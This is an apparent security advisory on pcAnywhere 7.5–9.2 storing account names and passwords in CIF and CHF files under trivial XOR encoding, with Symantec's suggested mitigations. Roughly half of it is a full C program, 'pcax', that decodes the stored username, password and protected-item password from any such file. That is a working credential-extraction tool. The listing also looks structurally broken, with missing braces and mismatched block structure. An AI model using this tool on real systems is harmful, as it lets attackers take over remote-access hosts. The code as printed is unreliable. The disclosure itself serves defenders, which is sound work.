



    Pascal  Longpre  found  following.   PcAnywhere  uses  a   trivial
    password encryption scheme (XOR based, again!!!) to store  account
    and password  information in  the configuration  file.   CIF files
    are used to  store callers information  and CHF files  are used to
    record  remote  slaves  information  (username,pw  and  domain) in
    order to automate the  process of logging in.   A second level  of
    protection (protect item  password) has also  been added on  those
    files to protect the viewing of properties.

    In a network  environment, the CIF  files are usually  stored on a
    centralized  file  server  for  easier  management and every slave
    must have read access to  them.  Having access to  CIF information
    can give an attacker a  way to access any waiting  pcAnywhere host
    on that network.

    In CHF  files, even  if you  uncheck the  "Automatically login  to
    host..." option, the  first character of  every field is  replaced
    with a space  but the rest  of the field's  information remains in
    the file.

    The following program will extract the username, password and  the
    Protect Item password from  any CIF or CHF  file.  It should  work
    fine with versions 7.5 to 9.2.

    // pcax - pcAnywhere password extraction program
    // This program extracts account information from CIF and CHF files.
    // Written by Pascal Longpre (
    // Date : April 27th, 2000
    // Tested on pcAnywhere version 7.5 to 9.2
    #include <windows.h>
    #include <stdio.h>
    void main(int argc, char **argv) {
      char szBuffer[3072];
      char UserName[32],Password[16],Pw2[16];
      int	 i, BytesRead;
      FILE *stream;
      printf("pcax - pcAnywhere password extractor\n");
      printf("Written by Pascal Longpre - \n");
      if (!argv[1]) {
        printf("USAGE : pcax filename\n");
        printf("        where filename is any .cif or .chf file\n");
    // Open the file in binary mode
      stream=fopen( argv[1], "r+b" );
      BytesRead= fread(szBuffer, 1, 3072, stream);
    // Extract CIF file account information
      if (strstr(argv[1],".cif")>0 || strstr(argv[1],".CIF")>0)
        for (i=0; i<32; i++)
          UserName[i]= szBuffer[0x1cc +i-1] ^ szBuffer[0x1cc+i] ^ (0xF+i);
        printf("Username :%s\n",UserName);
        for (i=0; i<16; i++)
          Password[i]= szBuffer[0x24d + i - 1] ^ szBuffer[0x24d + i] ^ (0x90+i);
        printf("User password :%s\n",Password);
    // Extract CHF files account information
      if (strstr(argv[1],".chf")>0 || strstr(argv[1],".CHF")>0)
        for (i=0; i<32; i++)
          UserName[i]= szBuffer[0x82d+i-1] ^ szBuffer[0x82d+i] ^ (0x70+i);
        printf("Username :% s\n",UserName);
        for (i=1; i<15; i++)
         Password[i-1]= szBuffer[0x8ad+i-1] ^ szBuffer[0x8ad+i] ^ (0xf0+i);
        printf("Password :%s\n",Password);
    // Protected item password - Same offset for both files
      for (i=0; i<16; i++)
        Pw2[i]= szBuffer[0x118 + i - 1] ^ szBuffer[0x118 + i] ^ (0x17+i);
      printf("Protected item password :%s\n",Pw2);


    Symantec suggests  the use  of the  public key  encryption option.
    They  also  suggest  using  any  third  party encryption software.
    However,  if  this  is  on  the  server  end  of  things  (ie,  it
    authenticates users) then storing the  passwords in a XOR form  is
    simply poor taste, poor design, and poor security.